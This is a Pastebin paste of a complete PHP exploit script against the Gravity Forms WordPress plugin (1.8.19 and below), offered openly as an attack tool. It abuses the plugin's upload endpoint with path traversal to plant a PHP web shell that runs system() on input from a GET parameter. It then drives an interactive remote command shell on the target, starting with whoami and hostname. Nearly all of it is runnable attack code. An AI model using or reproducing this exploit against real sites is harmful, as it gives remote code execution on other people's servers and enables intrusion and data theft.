Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /****************************************************************************************************************************
- *
- * Exploit Title : Gravity Forms [WP] - Arbitrary File Upload
- * Vulnerable Version(s): 1.8.19 (and below)
- * Write-Up : https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html
- * Coded by : Abk Khan [ an0nguy @ protonmail.ch ]
- *
- *****************************************************************************************************************************/
- error_reporting(0);
- echo "
- _____ _ _ ______ _ _
- / ____| (_) | | ____| | | |
- | | __ _ __ __ ___ ___| |_ _ _| |__ __ _| | |___
- | | |_ | '__/ _` \ \ / / | __| | | | __/ _` | | / __|
- | |__| | | | (_| |\ V /| | |_| |_| | | | (_| | | \__ \
- \_____|_| \__,_| \_/ |_|\__|\__, |_| \__,_|_|_|___/
- __/ |
- |___/ > an Exploiter by AnonGuy\n";
- $domain = (@$argv[1] == '' ? 'http://localhost/wordpress' : @$argv[1]);
- $url = "$domain/?gf_page=upload";
- $shell = "$domain/wp-content/_input_3_khan.php5";
- $separator = '-------------------------------------------------------------------';
- $ch = curl_init($url);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, '<?=system($_GET[0]);?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- $response = curl_exec($ch);
- curl_close($ch);
- if (strpos($response, '"ok"') !== false) {
- echo "$separator\nShell at $shell\n$separator\nSpawning a 'No-Session' Shell . . . Done!\n$separator\n";
- while ($testCom != 'exit') {
- $user = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));
- $b0x = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20hostname;%20echo%20'~'"), '~', '~'));
- echo "$user@$b0x:~$ ";
- $handle = fopen("php://stdin", 'r');
- $testCom = trim(fgets($handle));
- fclose($handle);
- $comOut = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";
- echo $comOut;
- }
- }
- else {
- die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");
- }
- function get_string_between($string, $start, $end)
- {
- # stolen from stackoverflow!
- $string = ' ' . $string;
- $ini = strpos($string, $start);
- if ($ini == 0)
- return '';
- $ini += strlen($start);
- $len = strpos($string, $end, $ini) - $ini;
- return substr($string, $ini, $len);
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement